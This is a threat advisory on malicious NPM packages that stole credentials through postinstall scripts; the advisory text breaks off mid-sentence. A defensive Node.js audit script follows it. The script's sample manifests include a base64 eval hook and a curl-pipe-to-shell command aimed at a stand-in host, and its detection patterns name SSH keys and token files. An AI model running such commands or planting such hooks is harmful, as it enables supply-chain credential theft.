NPM Credential Theft


EXECUTIVE SUMMARY

Security researchers have uncovered 10 malicious NPM packages designed to steal developer credentials and other sensitive data from infected systems. The malicious packages, published on the official NPM registry, targeted developers across Windows, macOS, and Linux environments by impersonating legitimate open-source libraries. Once installed, these packages executed obfuscated scripts to exfiltrate environment variables, authentication tokens, SSH keys, and system information to remote attacker-controlled servers. This campaign is an example of software supply chain compromise, affecting developers who unknowingly installed the malicious packages through automated build systems or dependency chains.

  • Threat Type: Credential Theft
  • Active Region: Global
  • Affected Sector: Cloud, Software Development, CI/CD Environment
  • Affected Product: Node.js, NPM-based projects
  • Severity: Critical
  • Published Date: October 29, 2025

TECHNICAL DETAILS

  • Attack Vector: Attackers leveraged the NPM ecosystem to publish packages mimicking legitimate libraries. Upon installation, post-installation scripts triggered obfuscated JavaScript that executed system commands to gather credentials and environment variables.
  • Initial Access: Through NPM install of compromised libraries (e.g., via…..
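As an added example (not code from the report or from any of the packages it describes), the Node.js audit below flags dependencies that declare install-time lifecycle scripts, the hook the attack vector above relies on, and rates a hook as high risk when its command shows credential-harvesting or download-and-run indicators. The indicator patterns, the sample manifests and the example.invalid host are constructed assumptions.

```javascript
// Added example, not the report's own code: audit package manifests for install-time
// lifecycle scripts, the hook the malicious packages used, and flag suspicious commands.
// Hooks npm runs automatically during install (prepare also runs for git/local deps).
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
// Assumed indicator patterns: references to secrets, download-and-run, or hidden code.
const SUSPICIOUS = [
  /\bprocess\.env\b/, /\.npmrc\b/, /\.ssh\b/, /id_rsa/,
  /\bcurl\b|\bwget\b/, /base64/i, /eval\(/, /\bnode\s+-e\b/,
];
// Constructed sample manifests standing in for node_modules/<pkg>/package.json.
const sampleManifests = [
  { name: "left-pad-utils", version: "1.0.2", scripts: { test: "jest" } },
  { name: "colorz", version: "0.3.1",
    scripts: { postinstall: "node -e \"eval(Buffer.from('Li4u','base64').toString())\"" } },
  { name: "build-helper", version: "2.1.0",
    scripts: { prepare: "curl -s https://example.invalid/x | sh" } },
];
// Report every lifecycle hook a package declares; any hook deserves review,
// and one matching an indicator is rated high.
function auditManifest(pkg) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (!cmd) continue;
    const indicators = SUSPICIOUS.filter((re) => re.test(cmd)).map((re) => re.source);
    findings.push({ package: pkg.name, version: pkg.version, hook, command: cmd,
      indicators, risk: indicators.length ? "high" : "review" });
  }
  return findings;
}
function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}
// Walk a real node_modules directory (scoped @org/pkg included) and audit it.
function scanNodeModules(dir) {
  const fs = require("fs"), path = require("path");
  const manifests = [];
  const walk = (d) => {
    for (const entry of fs.readdirSync(d, { withFileTypes: true })) {
      if (!entry.isDirectory()) continue;
      const full = path.join(d, entry.name);
      if (entry.name.startsWith("@")) { walk(full); continue; }
      const manifest = path.join(full, "package.json");
      if (fs.existsSync(manifest)) manifests.push(JSON.parse(fs.readFileSync(manifest, "utf8")));
    }
  };
  walk(dir);
  return auditAll(manifests);
}
console.table(auditAll(sampleManifests));
```

Running such an audit before lifecycle scripts execute requires installing with `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) and then calling `scanNodeModules("node_modules")` on the result, so that a flagged postinstall command is reviewed rather than run.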
